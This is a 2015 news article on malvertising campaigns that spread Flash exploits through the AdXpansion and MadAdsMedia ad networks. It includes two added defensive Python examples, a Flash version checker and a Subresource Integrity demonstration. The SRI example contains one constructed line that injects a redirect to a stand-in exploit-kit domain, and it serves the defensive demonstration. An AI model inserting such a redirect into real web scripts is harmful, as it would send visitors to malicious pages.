Exploit targets Flash versions earlier than 17.0.0.134

May 9, 2015 05:48 GMT  ·  By

A malicious advertiser managed to insert a bad ad into the AdXpansion ad network, delivering an exploit for Flash Player to visitors of major adult content websites.

Users do not have to click anywhere on the page to get infected; just loading it in a browser with a vulnerable version of Flash Player is sufficient to receive the payload, which could be anything from a banking Trojan to botnet malware.

Users with outdated Flash Player exposed

The rogue Flash advertisement carries the exploit code itself. This is a more direct approach than the one more commonly seen in malvertising, where the ad redirects the visitor to a domain hosting an exploit kit, which then serves an exploit for whichever vulnerable component it finds on the computer.

Researchers at Malwarebytes tracked down the campaign affecting AdXpansion and identified dozens of websites that served the malicious code in this drive-by attack.

“The advert, displaying sexual enhancement drugs, is loaded with malicious code that will immediately attempt to exploit the visitor, regardless of whether they click on the ad or not,” Jerome Segura says.

There are no statistics on the number of victims, but millions of users may be affected, given that the websites receive a combined total of more than 250 million visits per month.

Some of the websites that received the rogue advert are DrTuber (60.2 million monthly visits), NuVid (46.5 million visits) and HardSexTube (43.7 million users per month).

Exploit code could pass as legitimate

The exploit is for versions of Flash prior to 17.0.0.134, which was released in March to address a total of 11 vulnerabilities.
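Because the exposure here is purely a matter of which Flash build is installed, the practical check is a version comparison. The script below is an added example, not code from the article or from Malwarebytes; it compares a dotted build number field by field against the two patched releases the article names (17.0.0.134 here and 17.0.0.169 in the Trend Micro case reported further down). The sample inventory at the bottom is constructed, and the point it makes is that a plain string comparison gets this wrong: "9.0.0.0" sorts above "17.0.0.134" as text.

```python
"""Check whether a Flash Player build is older than a patched release.

Added example, not from the original article or from Malwarebytes.
Dotted version strings must be compared field by field as integers:
a plain string comparison would rank "9.0.0.0" above "17.0.0.134".
"""
from typing import Dict, Tuple

# Patched builds named in the article (Adobe release versions).
PATCHED_ADXPANSION = "17.0.0.134"   # March 2015 update
PATCHED_MADADSMEDIA = "17.0.0.169"  # April 2015 update


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '17.0.0.134' into (17, 0, 0, 134); reject non-numeric fields."""
    fields = version.strip().split(".")
    if not fields or not all(f.isdigit() for f in fields):
        raise ValueError(f"not a dotted numeric version: {version!r}")
    return tuple(int(f) for f in fields)


def is_vulnerable(installed: str, fixed_in: str) -> bool:
    """True when `installed` is strictly older than `fixed_in`.

    Shorter tuples are padded with zeros so '17.0' compares as '17.0.0.0'.
    """
    a, b = parse_version(installed), parse_version(fixed_in)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def exposure_report(installed: str) -> Dict[str, object]:
    """Summarise which of the two campaigns a given build was exposed to."""
    return {
        "installed": installed,
        "adxpansion_flash_ad": is_vulnerable(installed, PATCHED_ADXPANSION),
        "madadsmedia_nuclear_ek": is_vulnerable(installed, PATCHED_MADADSMEDIA),
    }


if __name__ == "__main__":
    # Constructed sample inventory, not real telemetry.
    for build in ("16.0.0.305", "17.0.0.134", "17.0.0.169", "9.0.0.0"):
        print(exposure_report(build))
```

Note that a machine on 17.0.0.134 was protected against this campaign but still exposed to the later one, which is why the report tracks both thresholds separately.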

Segura says the attackers relied on ActionScript 3 code with deceptive module names to evade detection, and that its structure could easily pass as legitimate.

Malwarebytes alerted AdXpansion and received a reply that the malicious advertiser's activity had been stopped.

Malvertising has become a real problem lately, as reports of such incidents have increased.

In a blog post on Thursday, security company Trend Micro announced that another ad network, MadAdsMedia, has been leveraged to distribute an exploit for a security hole in Flash Player earlier than 17.0.0.169.

In this case, the attackers compromised a company server storing a JavaScript library that determines which ads are displayed on a publisher's site. The library's code was modified to redirect visitors to a domain hosting the Nuclear exploit kit.
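The MadAdsMedia case is a tampered third-party script, and the publisher-side control for exactly that is Subresource Integrity: the publisher pins a hash of the library in the script tag and the browser refuses any copy whose content does not match. The code below is an added example, not code from the article, Trend Micro or MadAdsMedia; it computes the SRI token for a constructed stand-in library, emulates the browser's check against a tampered copy with an injected redirect, and builds the tag a publisher would embed. The library bodies, the script URL and the redirect domain are all hypothetical.

```python
"""Subresource Integrity (SRI) check for a third-party ad script.

Added example, not code from the article, Trend Micro or MadAdsMedia.
A publisher that pins the hash of the ad-selection library it embeds makes
the browser reject a modified copy such as the one described above.
All library contents and URLs here are constructed for the example.
"""
import base64
import hashlib
from typing import Dict, Set

SRI_ALGOS = ("sha256", "sha384", "sha512")  # weakest to strongest

# Constructed stand-in for a legitimate ad-selection library (hypothetical).
GOOD_LIBRARY = b"function pickAd(slot){return slot.ads[0].url;}\n"

# Same library with an injected redirect to a hypothetical attacker domain.
TAMPERED_LIBRARY = (
    GOOD_LIBRARY
    + b"location.replace('http://ek.example/landing');\n"  # hypothetical
)


def sri_digest(content: bytes, algo: str = "sha384") -> str:
    """Return the SRI token ('sha384-<base64 digest>') for `content`."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def integrity_matches(content: bytes, integrity_attr: str) -> bool:
    """Emulate the browser's check: does the fetched body match a pinned hash?

    The integrity attribute may carry several space-separated tokens. As in
    the SRI spec, only the tokens using the strongest listed algorithm are
    considered, and a match against any one of them is accepted. Unlike a
    browser, which skips enforcement when no token is recognised, this
    helper returns False in that case so a misconfigured pin is noticed.
    """
    by_algo: Dict[str, Set[str]] = {}
    for tok in integrity_attr.split():
        algo, _, b64 = tok.partition("-")
        if algo in SRI_ALGOS and b64:
            by_algo.setdefault(algo, set()).add(b64)
    if not by_algo:
        return False
    strongest = max(by_algo, key=SRI_ALGOS.index)
    actual = sri_digest(content, strongest).split("-", 1)[1]
    return actual in by_algo[strongest]


def script_tag(src: str, integrity: str) -> str:
    """The tag a publisher embeds; crossorigin is required for cross-origin SRI."""
    return (f'<script src="{src}" integrity="{integrity}" '
            'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_digest(GOOD_LIBRARY)
    print(script_tag("https://ads.example/lib.js", pinned))  # hypothetical URL
    print("good copy accepted:", integrity_matches(GOOD_LIBRARY, pinned))
    print("tampered copy accepted:", integrity_matches(TAMPERED_LIBRARY, pinned))
```

The caveat is that SRI only works for a resource whose bytes do not change between the time the hash is taken and the time the browser fetches it, and ad networks update their serving scripts often; a publisher can pin a vendored, versioned copy but not a URL the network rewrites at will. It also does nothing for the AdXpansion case, where the exploit sat inside the Flash creative rather than in a script the publisher controls.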